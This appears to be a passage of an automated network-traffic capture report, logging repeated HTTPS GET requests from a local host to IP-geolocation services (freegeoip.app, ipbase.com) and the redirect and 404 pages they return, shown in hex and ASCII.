                                      2024-09-06 23:48:42 UTC1369INData Raw: 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a
                                      Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:48:42 UTC1087INData Raw: 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:48:42 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                      Data Ascii: 1
                                      2024-09-06 23:48:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      52192.168.2.549804188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:46 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:46 UTC643INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:46 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:46 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v6u9FAteQIANcOPaXAXQY8NKBbfBFGgZpxr5peT5VpMvf0yTVBLXoeSCqaAWCcLrmzOrNrX75Nr1xHaMEFdf2z93zURUj7XrpPB%2FhK%2B%2FWL3SzfwV6xPkUJG%2BO8fk%2FaqW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a0f4c614286-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:46 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      53192.168.2.549806104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:47 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:47 UTC736INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:47 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7731
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VV1ZPBJARFKHFCR3595N5
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e9e%2Fh7JVprtLxO%2FPbhfVD3y35jYJUvbc%2Fhetbc2uJSkZJJJxGS95uH8vHxplYooxhYojAIDEaG6XzKZLUZT3O4LPbtRgUzATZD2M6aE%2B8QftJwNYloxUdPZ5XYIa"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a12ff040f7b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:47 UTC633INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:47 UTC1369INData Raw: 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20
                                      Data Ascii: g: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:48:47 UTC1087INData Raw: 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329
                                      2024-09-06 23:48:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      54192.168.2.549808188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:49 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:49 UTC639INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:49 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:49 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POFqURfHR92Gx%2FHbivBY8kcLJq27Slu11HxEUdfrnT1W58JuhPYapNXEAOGcK5Cnf4rKfAWsW27ZqS85iakKvFPuzIQjv%2FCEQVWe%2F6SSN1WYHsHh7wXmnIAkVLKU7Lhw"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a1f4a7a43a4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:49 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      55192.168.2.549809104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:49 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:50 UTC733INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:49 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 19283
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VV4FTY92EP4BGKDEW27XR
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UDdTmFlZmMAt7LXKvFqcrF8SKGsaosrWXlZWTCYkx9RjJN8jk8O78%2FkTaA9qlJr7eiPOzPe%2F87svJtHKwYI7baSVBG5wcrWV9AdcTw44YSVHXe1PC2JXZmM4TYQ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a230fabc466-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:50 UTC636INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:50 UTC1369INData Raw: 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30
                                      Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100
                                      2024-09-06 23:48:50 UTC1084INData Raw: 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329493
                                      2024-09-06 23:48:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      56192.168.2.549813104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:54 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:54 UTC745INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:54 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 19288
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VV95PGB6QJJK8G04N4G00
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QGaO3PrubpmaYJ7uKjKJNOhaAauE%2BFEn2tUih6gNRBldnrJ5W01YBQUvUrFkSAfEwC%2BbCNwPpJM%2BkPxYAAXvWR%2FPLx8%2F1BeJwSksN%2BUh%2B%2Fap8BJ5p8w6jCLwIDJ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a40fbd541e9-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:54 UTC624INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:54 UTC1369INData Raw: 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20
                                      Data Ascii: padding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center;
                                      2024-09-06 23:48:54 UTC1096INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.242085
                                      2024-09-06 23:48:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      57192.168.2.549817104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:58 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:58 UTC740INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:58 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7939
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VVD7KPNRD8RQ62YJBMSPR
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NhMnhnRZoWX7gt9qavAxJfKor8Dly6ty3%2Fv%2BnjPyphmcmKstsM8YXuJiPDhIczPU7ARbijNcsdln3ZIU%2FgMo%2B0j%2BJOJWrdRpK9oyCpsbsQmsptQovwUYH8%2BaSVPp"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25a5afdc642a5-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:58 UTC629INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:58 UTC1369INData Raw: 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67
                                      Data Ascii: dding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heig
